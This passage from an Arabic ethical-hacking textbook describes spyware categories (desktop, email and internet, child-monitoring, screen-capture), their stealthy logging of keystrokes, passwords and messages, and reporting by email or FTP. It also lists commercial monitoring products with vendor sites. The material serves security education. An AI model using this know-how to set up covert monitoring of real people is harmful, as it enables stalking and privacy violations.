‫ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻣﻊ ‪ Activity Monitor Server‬ﻋﻠﯾﮫ أو ﻋن طرﯾﻖ ‪ Active Directory Group Policy‬ﻓﻲ دوﻣﯾن‬
‫‪ .Windows‬أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﻓﻲ اﻟﺷﺑﻛﺔ ﺗﺣت اﻟﺳﯾطرة ﯾﻣﻛن أن ﯾﺗﺟﺳس ﻋﻠﯾﮫ ﻋن ﺑﻌد ﻣﻊ ھذه اﻷداة ﻓﻘط ﻋن طرﯾﻖ ﺗﺛﺑﯾت ‪ Agent‬ﻋﻠﻰ‬
‫اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﻣﻛﻧك ﺿﺑط ﺑرﻧﺎﻣﺞ ‪ Activity Monitor Server‬ﻟﺗﺳﺟﯾل أﻧﺷطﺔ ﺟﻣﯾﻊ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺗﺻﻠﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪.‬‬
‫اﻟﻣﻣﯾزات‪:‬‬
‫‪ -‬ﻋرض ﻻﯾف ﻟﺳطﺢ اﻟﻣﻛﺗب اﻟﺑﻌﯾد )اﻟﺻورة(‪.‬‬
‫‪ -‬ﻣن اﻟﺳﮭل ﻣراﻗﺑﺔ اﺳﺗﺧدام اﻹﻧﺗرﻧت‪.‬‬
‫‪ -‬ﻣراﻗﺑﺔ اﺳﺗﺧدام اﻟﺑرﻣﺟﯾﺎت‪.‬‬
‫‪ -‬ﺗﺳﺟﯾل ﺳﺟل اﻟﻧﺷﺎطﺎت )‪ (activity log‬ﻟﺟﻣﯾﻊ أﻣﺎﻛن اﻟﻌﻣل ﻓﻲ ﻣوﻗﻊ ﻣرﻛزي واﺣد ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟرﺋﯾﺳﻲ ﻣﻊ ﺗﺛﺑﯾت‬
‫‪.Activity Monitor‬‬
‫‪ -‬ﺗﺧزﯾن ﺗﻘرﯾر ﻛﺎﻣل ﻋن اﻻﺗﺻﺎﻻت ﻟﻛل ﻣﺳﺗﺧدم )رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣرﺳﻠﺔ واﻟﻣﺳﺗﻠﻣﺔ‪ ،‬دردﺷﺎت اﻟﺗراﺳل اﻟﻔوري ورﺳﺎﺋل‬
‫ﻛﺗﺑﺗﮭﺎ ﻓﻲ اﻟﻣﻧﺗدﯾﺎت ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت(‪.‬‬
‫‪ -‬ﺗﺗﺑﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻷي ﻣﺳﺗﺧدم‪ ،‬ﺣﺗﻰ ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ اﻟﺷﺎﺷﺔ‪ ،‬ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪.‬‬
‫‪ -‬اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻋﻠﻰ ﺷﺑﻛﺎت اﻟﻛﻣﺑﯾوﺗر‪ .‬ﺑدء أو إﻧﮭﺎء اﻟﻌﻣﻠﯾﺎت ﻋن ﺑﻌد‪ ،‬ﺗﺷﻐﯾل اﻷواﻣر‪ ،‬ﻧﺳﺦ اﻟﻣﻠﻔﺎت ﻣن اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة‪ .‬ﻗد ﺗﺣﺗﺎج‬
‫ﻟﺗﺷﻐﯾل ﺣﺗﻰ ﺗﺷﻐﯾل اﻟﻛﻣﺑﯾوﺗر أو إﻋﺎدة ﺗﺷﻐﯾﻠﮫ‪ ،‬ﻧﺎھﯾك ﻋن ﺗﺳﺟﯾل ﺧروج اﻟﻣﺳﺗﺧدم اﻟﺣﺎﻟﻲ‪.‬‬
‫‪ -‬ﻧﺷر ‪) Activity Monitor Agent‬اﻟﺟزء اﻟﻌﻣﯾل ﻣن اﻟﺑرﻧﺎﻣﺞ( ﻋن ﺑﻌد ﻣن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺳؤول ﻋﻠﻰ ﻛﺎﻓﺔ أﺟﮭزة‬
‫اﻟﻛﻣﺑﯾوﺗر ﻓﻲ اﻟﺷﺑﻛﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪417‬‬

‫‪Desktop Spyware: other tools‬‬


‫ھﻧﺎك اﻟﻌدﯾد ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس ﺳطﺢ اﻟﻣﻛﺗب اﻟﻣﺗﺎﺣﺔ ﻓﻲ اﻟﺳوق اﻟﺗﻲ ﯾﻣﻛن أن ﯾﺳﺗﺧدﻣﮭﺎ اﻟﻣﮭﺎﺟم ﻟﻣراﻗﺑﺔ ﺳطﺢ اﻟﻣﻛﺗب اﻟﻣﺳﺗﺧدم‬
‫اﻟﺑﻌﯾد‪ .‬ھذا اﻟﺗﺟﺳس ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟرﺻد وﺗﺳﺟﯾل ﻛل اﻟﺗﻔﺎﺻﯾل ﻋن ﻧﺷﺎط اﻟﻛﻣﺑﯾوﺗر واﻹﻧﺗرﻧت اﻟﻣﺳﺗﺧدم‪ .‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺗﺳﺟﯾل ﺿرﺑﺎت‬
‫اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬واﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪ ،‬اﻟﺑراﻣﺞ ﻗﯾد اﻟﺗﺷﻐﯾل ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم‪ ،‬واﻷﺣﺎدﯾث‪ ،‬واﻻﺗﺻﺎﻻت‪ ،‬اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ واﻟدردﺷﺔ‪ ،‬وﺗﺣﻣﯾل اﻟﻣﻠﻔﺎت‪ ،‬ﻓﺗﺢ ‪ /‬إﻏﻼق اﻟﻧواﻓذ‪ ،‬وﻣﺎ إﻟﻰ ذﻟك‪ .‬ﯾﻣﻛﻧك أﯾﺿﺎ أﺧذ ﻟﻘطﺎت ﻣن ﺳطﺢ اﻟﻣﻛﺗب اﻟﻣﺳﺗﺧدم اﻟﺑﻌﯾد وأﻛﺛر‬
‫ﻣن ذﻟك ﺑﻛﺛﯾر‪ .‬ﺑﻌض ﻣن ﺑراﻣﺞ ﺗﺟﺳس ﺳطﺢ اﻟﻣﻛﺗب اﻟﺗﻲ ﻗد ﯾﺳﺗﺧدﻣﮭﺎ اﻟﻣﮭﺎﺟﻣﯾن ﻟرﺻد ﺳطﺢ اﻟﻣﻛﺗب ﻋن ﺑﻌد ﻣدرﺟﺔ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Remote Desktop Spy available at http://www.global-spy-software.com‬‬
‫‪SSPro available at http://www.gpsoftdev.com‬‬
‫‪RecoveryFix Employee Activity Monitor available at http://www.recoveryfix.com‬‬
‫‪Employee Desktop Live Viewer available at http://www.nucleustechnologies.com‬‬
‫‪NetVizor available at http://www.netvizor.net‬‬
‫‪Net Spy Pro available at http://www.net-monitoring-software.com‬‬
‫‪REFOG Employee Monitor available at http://www.refog.com‬‬
‫‪osMonitor available at http://www.os-monitor.com‬‬
‫‪LANVisor available at http://www.lanvisor.com‬‬
‫‪Work Examiner Standard available at http://www.workexaminer.com‬‬

‫‪Email and Internet Spyware‬‬

‫‪Email Spyware -1‬‬

‫‪ Email spyware‬ھو ﺑرﻧﺎﻣﺞ أو ﺗطﺑﯾﻖ ﻟرﺻد‪ ،‬وﺗﺳﺟﯾل‪ ،‬وﺗوﺟﯾﮫ ﻛﺎﻓﺔ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟواردة واﻟﺻﺎدرة‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ﺧدﻣﺎت‬
‫اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣﺛل ‪ Hotmail‬وﺑرﯾد ﯾﺎھو‪ .‬ﺑﻣﺟرد ﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗرﯾد ﻣراﻗﺑﺔ‪ ،‬ﻓﺎن ھذا اﻟﻧوع ﻣن ﺗطﺑﯾﻘﺎت اﻟﺗﺟﺳس‬
‫ﯾﺳﺟل وﯾرﺳل ﻧﺳﺧﺎ ﻣن ﺟﻣﯾﻊ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟواردة واﻟﺻﺎدرة ﻟك ﻣن ﺧﻼل ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد أو ﯾﺣﻔظﮫ ﻋﻠﻰ‬
‫ﻣﺟﻠد ﻓﻲ اﻟﻘرص اﻟﻣﺣﻠﻲ ﻟﻠﻛﻣﺑﯾوﺗر ﻟرﺻدھﺎ ﻻﺣﻘﺎ‪ .‬ﯾﻌﻣل ﻓﻲ اﻟوﺿﻊ ‪stealth mode‬؛ اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻻ ﯾﻛون ﻋﻠﻰ ﺑﯾﻧﺔ ﻣن‬
‫وﺟود ﺑراﻣﺞ ﺗﺟﺳس اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﮭم‪ .‬ﻛﻣﺎ أﻧﮭﺎ ﻗﺎدرة ﻋﻠﻰ ﺗﺳﺟﯾل اﻟرﺳﺎﺋل اﻟﻔورﯾﺔ اﻟﺗﻲ أﺟرﯾت ﻓﻲ‪،AIM :‬‬
‫‪ ،MSN‬ﯾﺎھو‪ ،‬ﻣﺎي ﺳﺑﯾس‪ ،‬اﻟﻔﯾﺳﺑوك‪ ،‬اﻟﺦ‪.‬‬

‫‪Internet Spyware -2‬‬

‫‪ Internet Spyware‬ھﻲ اﻷداة اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﺟﻣﯾﻊ ﺻﻔﺣﺎت اﻟوﯾب اﻟﺗﻲ ﺗم اﻟوﺻول إﻟﯾﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ ﺟﮭﺎز‬
‫اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻓﻲ ﻏﯾﺎﺑك‪ .‬ﻓﮭو ﯾﺟﻌل ﺳﺟل زﻣﻧﻲ ﻟﺟﻣﯾﻊ ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪ .‬ھذا ﯾﺣﻣل ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد ﺑدء ﺗﺷﻐﯾل اﻟﻧظﺎم‪.‬‬
‫ﯾﺗم ﺗﺷﻐﯾﻠﮫ ﻓﻲ اﻟوﺿﻊ ‪ ،stealth mode‬ﻣﻣﺎ ﯾﻌﻧﻲ أﻧﮫ ﯾﻌﻣل ﻓﻲ اﻟﺧﻠﻔﯾﺔ وﻻ ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك أﺑدا اﻟﻛﺷف‬
‫ﻋن ھذه اﻷداة اﻟﻣﺛﺑﺗﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻛﺗﺎﺑﺔ ﺟﻣﯾﻊ ﻋﻧﺎوﯾن ‪ URL‬اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻓﻲ ﻣﻠف اﻟﺳﺟل وإرﺳﺎﻟﮭﺎ إﻟﻰ‬
‫ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد‪ .‬ﺑﺎﺳﺗﺧدام ﺑراﻣﺞ ﺗﺟﺳس اﻹﻧﺗرﻧت‪ ،‬ﯾﻣﻛن ﻟﻠﻣرء أداء ﻣراﻗﺑﺔ اﻟﻧﺷﺎط ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻋﻠﻰ أي ﺟﮭﺎز‬
‫ﻛﻣﺑﯾوﺗر‪ .‬ﺣﯾث اﻧﮫ ﯾوﻓر ﺗﻘرﯾرا ﻣوﺟزا ﻋن اﺳﺗﺧدام ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﺑﺷﻛل ﻋﺎم ﻣﺛل اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪ ،‬واﻟوﻗت اﻟذي ﯾﻘﺿﯾﮫ ﻓﻲ ﻛل‬
‫ﻣوﻗﻊ‪ ،‬ﻓﺿﻼ ﻋن ﻓﺗﺢ ﻛﺎﻓﺔ اﻟﺗطﺑﯾﻘﺎت ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ اﻟﺗﺎرﯾﺦ ‪ /‬اﻟوﻗت‪ .‬ﻛﻣﺎ أﻧﮫ ﯾﺳﻣﺢ ﻟك ﻟﻣﻧﻊ اﻟوﺻول إﻟﻰ ﺻﻔﺣﺔ وﯾب ﻣﻌﯾﻧﺔ أو ﻣوﻗﻊ‬
‫ﻛﺎﻣل ﺑذﻛر ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ أو اﻟﻛﻠﻣﺎت اﻟرﺋﯾﺳﯾﺔ اﻟﺗﻲ ﺗرﯾد ﻣﻧﻌﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪.‬‬
‫‪Email and Internet Spyware: Power Spy‬‬
‫اﻟﻣﺻدر‪http://ematrixsoft.com :‬‬

‫ﺑرﻣﺟﯾﺎت ‪ Power Spy‬ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻣن ﻣﻛﺎن ﺑﻌﯾد ﻛﻠﻣﺎ ﻛﻧت ﺑﻌﯾدا ﻋن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻓﺈﻧﮫ ﯾﺳﺟل ﻛل‬
‫اﺳﺗﺧدام اﻟﻔﯾﺳﺑوك‪ ،‬وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ورﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬وﻣواﻗﻊ اﻟوﯾب اﻟﺗﻲ ﻗﻣت ﺑزﯾﺎرﺗﮭﺎ‪ ،‬دردﺷﺎت ‪ IMS‬ﻓﻲ ‪Windows‬‬
‫‪،ICQ ،GADU-GADU ،Google Talk ،Tencent QQ ،Yahoo Messenger ،SKYPE ،(MSN) Live Messenger‬‬
‫‪ ،(AIM) AOL Instant Messenger‬وأﻛﺛر ﻣن ذﻟك‪ .‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﻓﺈﻧﮫ ﯾﻘوم ﺑﺗﺳﺟﯾل ﺑﯾﺎﻧﺎت ‪ ،clipboard‬وﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪418‬‬

‫ﺗﻣت ﻛﺗﺎﺑﺗﮭﺎ‪ ،‬ﻓﺗﺢ اﻟﻣﺳﺗﻧدات‪ ،‬ﻓﺗﺢ اﻟﻧواﻓذ‪ ،‬واﻟﺗطﺑﯾﻘﺎت اﻟﻣﻧﻔذة‪ .‬ﯾﺑدأ ﺗﻠﻘﺎﺋﯾﺎ ﻣﻊ ﺑدء ﺗﺷﻐﯾل اﻟﻧظﺎم‪ ،‬وﯾﻌﻣل ﺳرا‪ ،‬وﯾرﺳل اﻟﺗﻘﺎرﯾر إﻟﻰ ﺳﺟل‬
‫ﺑرﯾدك اﻹﻟﻛﺗروﻧﻲ أو ‪ .FTP‬ﯾﻣﻛﻧك اﻟﺗﺣﻘﻖ ﻣن ھذه اﻟﺗﻘﺎرﯾر ﻓﻲ أي ﻣﻛﺎن ﺗرﯾد‪.‬‬

‫‪Internet and Email Spyware: other tools‬‬

‫‪ Internet and email Spyware‬ﯾﻘوم ﺑﺗﺳﺟﯾل ﻛﻣﺎ ﯾﻘوم ﺑﺎﺳﺗﻌراض ﺟﻣﯾﻊ اﻷﻧﺷطﺔ ﻣﺛل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ‪،‬‬
‫وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر‪ ،‬واﻷﻗراص‪ ،‬واﻟﮭواﺗف اﻟﻣﺣﻣوﻟﺔ‪ .‬ﺣﺗﻰ أﻧﮫ ﯾﺣﻣﻲ ﻋﺎﺋﻠﺗك ﻣن ﺧطر اﻻﻧﺗرﻧت وﯾﺣﻔظ اﻟﺷرﻛﺔ ﻣن‬
‫اﻟﻣﺧﺎطر واﻟﺧﺳﺎﺋر‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻹﻧﺗرﻧت واﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪eBLASTER available at http://www.spectorsoft.com‬‬
‫‪Imonitor Employee Activity available at http://www.employee-monitoring-software.cc‬‬
‫‪Employee monitoring available at http://employeemonitoring.net‬‬
‫‪OsMonitor available at http://www.os-monitor.com‬‬
‫‪Ascendant NFM available at http://www.ascendant-security.com‬‬
‫‪Spylab WebSpy available at http://www.spylab.org‬‬
‫‪Personal Inspector available at http://www.spyarsenal.com‬‬
‫‪Cyberspy available at http://www.cyberspysoftware.com‬‬
‫‪AceSpy available at http://www.acespy.com‬‬
‫‪Emailobserver available at http://www.softsecurity.com‬‬
‫‪Child Monitoring Spyware‬‬

‫‪ Child monitoring spyware‬ﺗﺳﻣﺢ ﻟك ﺑﺗﺗﺑﻊ و ﻣراﻗﺑﺔ ﻣﺎ ﯾﻘوم ﺑﮫ أطﻔﺎﻟك ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺳواء ﻣﺗﺻﻼ ﺑﺎﻷﻧﺗرﻧت أو ﻏﯾر ﻣﺗﺻل‪ .‬ﻓﺑدﻻ‬
‫ﻣن اﻟﻧظر ﻋﻠﻰ ﻣﺎ ﯾﻘوم ﺑﮫ اﻟطﻔل ﻓﻲ ﻣرات ﻋده‪ ،‬ﻓﯾﻣﻛن ﻟﻠﻣرء اﺳﺗﺧدام ‪ Child monitoring spyware‬ﻓﻲ ﻣﻌرﻓﺔ ﻛﯾﻔﯾﺔ ﻗﺿﺎء اﻟوﻗت‬
‫ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ھذا ﯾﻌﻣل ﻓﻲ وﺿﻊ اﻟﺷﺑﺢ)‪ (Stealth mode‬؛ أطﻔﺎﻟك ﺳوف ﻻ ﯾﻌﻠﻣون ﺑﺣﻘﯾﻘﺔ أﻧك ﺗﺷﺎھدھم‪ .‬ﺑﻌد اﻟﺗﺛﺑﯾت‪ ،‬ﻓﺎن ھذا‬
‫اﻟﺗطﺑﯾﻖ ﯾﻘوم ﺑﺗﺳﺟﯾل اﻟﺑراﻣﺞ اﻟﻣﺳﺗﺧدﻣﺔ‪ ،‬واﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪ ،‬وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ وﻧﻘرات اﻟﻣﺎوس‪ ،‬وأﺧذ ﻟﻘطﺎت ﻣن اﻟﻧﺷﺎط اﻟﺗﻲ‬
‫ﺗظﮭر ﻋﻠﻰ اﻟﺷﺎﺷﺔ‪ .‬ﺟﻣﯾﻊ اﻟﺑﯾﺎﻧﺎت ﯾﻣﻛن اﻟوﺻول إﻟﯾﮭﺎ ﻣن ﺧﻼل واﺟﮭﺔ اﻟوﯾب اﻟﻣﺣﻣﯾﺔ ﺑﻛﻠﻣﺔ ﻣرور‪.‬‬
‫ھذا ﯾﺳﻣﺢ ﻟك أﯾﺿﺎ ﺑﺣﻣﺎﯾﺔ أطﻔﺎﻟك ﻣن اﻟوﺻول إﻟﻰ ﻣﺣﺗوى وﯾب ﻏﯾر ﻣﻧﺎﺳب ﻣن ﺧﻼل وﺿﻊ اﻟﻛﻠﻣﺎت اﻟرﺋﯾﺳﯾﺔ اﻟﻣﺣددة اﻟﺗﻲ ﺗرﯾد ﻣﻧﻌﮭﺎ‪.‬‬
‫ﺣﯾث ﯾﻘوم ھذا اﻟﺗطﺑﯾﻖ ﺑﺈرﺳﺎل ﺗﻧﺑﯾﮫ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ ﻛﻠﻣﺎ واﺟﮭت ﻛﻠﻣﺎت رﺋﯾﺳﯾﺔ ﻣﺣددة ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك أو ﻛﻠﻣﺎ أراد‬
‫أطﻔﺎﻟك اﻟوﺻول اﻟﻰ ﻣﺣﺗوى ﻏﯾر ﻻﺋﻖ‪ .‬ﻛﻣﺎ أﻧﮫ ﯾﺳﺟل اﻷﻧﺷطﺔ اﻟﻣﺧﺗﺎرة‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك اﻟﻠﻘطﺎت‪ ،‬وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬وﻣواﻗﻊ اﻻﻧﺗرﻧت‪.‬‬
‫‪ Child monitoring spyware‬ﺗﺳﺟل ﺟﻣﯾﻊ أﻧﺷطﺔ طﻔﻠك ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر وﯾوﻓر ﻟﮭم إﻣﺎ ﻓﻲ ﻣﻠف ﻣﺧﻔﻲ ﻣﺷﻔرة أو ﯾرﺳل إﻟﻰ ﻋﻧوان‬
‫اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد‪ .‬ﻛﻣﺎ ﯾﺳﺟل اﻟوﻗت اﻟذي ﺗم ﻓﺗﺢ اﻟﺗطﺑﯾﻘﺎت ﻓﯾﮫ‪ ،‬ﻣﻘدار اﻟوﻗت اﻟذي ﯾﻧﻔﻖ ﻋﻠﻰ اﻹﻧﺗرﻧت أو اﻟﻛﻣﺑﯾوﺗر‪ ،‬ﻣﺎ ﯾﻔﻌﻠوﻧﮫ ﻋﻠﻰ‬
‫اﻟﻛﻣﺑﯾوﺗر‪ ،‬وھﻠم ﺟرا‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪419‬‬

‫‪Child Monitoring Spyware: Net Nanny Home Suite‬‬


‫اﻟﻣﺻدر‪http://www.netnanny.com :‬‬
‫‪ Net Nanny's parental control software‬ﻣﻊ أدوات اﻟﺣﻣﺎﯾﺔ ﻓﻲ اﻹﻧﺗرﻧت ﯾﺳﻣﺢ ﻟك ﻟﺣﻣﺎﯾﺔ اﻟطﻔل ﻋﻠﻰ اﻹﻧﺗرﻧت ﻣن ﻣﺣﺗوى ﻏﯾر‬
‫ﻻﺋﻖ‪ ،‬واﻟﻣواد اﻹﺑﺎﺣﯾﺔ‪ ،‬واﻟﻣﺣﺗوﯾﺎت اﻟﺧﻠﯾﻌﺔ اﻷﺧرى‪ .‬ھو ﻋﺑﺎره ﻋن ﻓﻠﺗر واﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺎﻟﺣﻔﺎظ ﻋﻠﻰ اﺳﺗﺧدام اﻻﻧﺗرﻧت اﻟﻣﻧزﻟﻲ ﻣن أي‬
‫ﻣﻛﺎن ﻓﻲ أي وﻗت ﻋن طرﯾﻖ أدوات اﻹدارة ﻋن ﺑﻌد‪ .‬ﯾﻣﻛﻧك ﺿﺑط إﻋدادات اﻟﻔﻠﺗرة وﻓﻘﺎ ﻟﻠﺗﻔﺿﯾﻼت اﻟﺷﺧﺻﯾﺔ‪ ،‬وﺗﺣﺗﺎج ﻟرﺻد ﺗﺻﻔﺢ‬
‫اﻹﻧﺗرﻧت واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ ﻣن أي ﻣﻛﺎن‪ .‬ﻓﺈﻧﮫ ﯾﻣﻛن إﻧﺷﺎء ﺗﻧﺑﯾﮭﺎت ‪IM predators‬و‪ .cyber bullies‬ﻓﺈﻧﮫ ﯾوﻓر وﺻول ﻣﺣﻣﻲ ﺑﻛﻠﻣﺔ‬
‫ﻣرور ﻟﻶﺑﺎء واﻷﻣﮭﺎت واﻟﻘﯾود اﻟﻣﺧﺻﺻﺔ ﻟﻛل ﻓرد ﻣن أﻓراد اﻷﺳرة‪ .‬ﯾﻣﻛﻧك أن ﺗرى ﺗﻘﺎرﯾر ﻋن ﻧﺷﺎط اﻹﻧﺗرﻧت أطﻔﺎﻟك وﺳﺟﻼت اﻟرﺳﺎﺋل‬
‫اﻟﻔورﯾﺔ‪.‬‬

‫‪Child Monitoring Spyware: other tools‬‬


‫ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس ﻟﻣراﻗﺑﺔ اﻟطﻔل اﻟﺗﻲ ﺗﺗوﻓر ﺑﺳﮭوﻟﺔ ﻓﻲ اﻟﺳوق‪:‬‬
‫‪Aobo Filter for PC available at http://www.aobo-porn-filter.com/‬‬
‫‪CyberSieve available at http://www.softforyou.com‬‬
‫‪Child Control available at http://www.salfeld.com‬‬
‫‪SentryPC available at http://www.sentry9c.com‬‬
‫‪Spytech SentryPC available at http://www.spytech-web.com‬‬
‫‪K9 Web Protection available at http://www1.k9webprotection.com/‬‬
‫‪Verity Parental Control Software available at http://www.nchsoftware.com‬‬
‫‪Profil Parental Filter available at http://www.graftechnology.com/‬‬
‫‪PC Pandora available at http://www.pcpandora.com/‬‬
‫‪Kidswatch available at http://www.kidswatch.com‬‬

‫‪Screen Capturing Spyware‬‬

‫‪ Screen capturing spyware‬ھﻲ ﺑراﻣﺞ اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ أﻧﺷطﺔ اﻟﻛﻣﺑﯾوﺗر أو أﺧذ ﻟﻘطﺎت ‪ screenshot‬ﻣن اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗم‬
‫ﺗﺛﺑﯾت اﻟﺑرﻧﺎﻣﺞ ﻋﻠﯾﮫ‪ .‬ھذا ﯾﺄﺧذ ﻟﻘطﺎت ﻣن اﻟﻛﻣﺑﯾوﺗر ﻣﺣﻠﻲ أو اﻟﺑﻌﯾد ﻋﻠﻰ ﻓﺗرات زﻣﻧﯾﺔ ﻣﺣددة وﯾوﻓرھم إﻣﺎ ﻋﻠﻰ اﻟﻘرص اﻟﻣﺣﻠﻲ ﻓﻲ ﻣﻠف‬
‫ﻣﺧﻔﻲ ﻟﻠﻣراﺟﻌﺔ ﻓﻲ وﻗت ﻻﺣﻖ أو ﯾرﺳﻠﮭﺎ إﻟﻰ أﺣد اﻟﻣﮭﺎﺟﻣﯾن ﻣن ﺧﻼل ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ أو ‪ FTP‬اﻟﻣﺣدد ﻣﺳﺑﻘﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪420‬‬

‫‪ Screen capturing spyware‬ﻟﯾس ﻓﻘط ﻗﺎدرا ً ﻋﻠﻰ اﻟﺗﻘﺎط ﻟﻘطﺎت وﻟﻛن أﯾﺿﺎ ﯾﻠﺗﻘط ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬ﻧﺷﺎط اﻟﻣﺎوس ‪ ،‬ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ‬
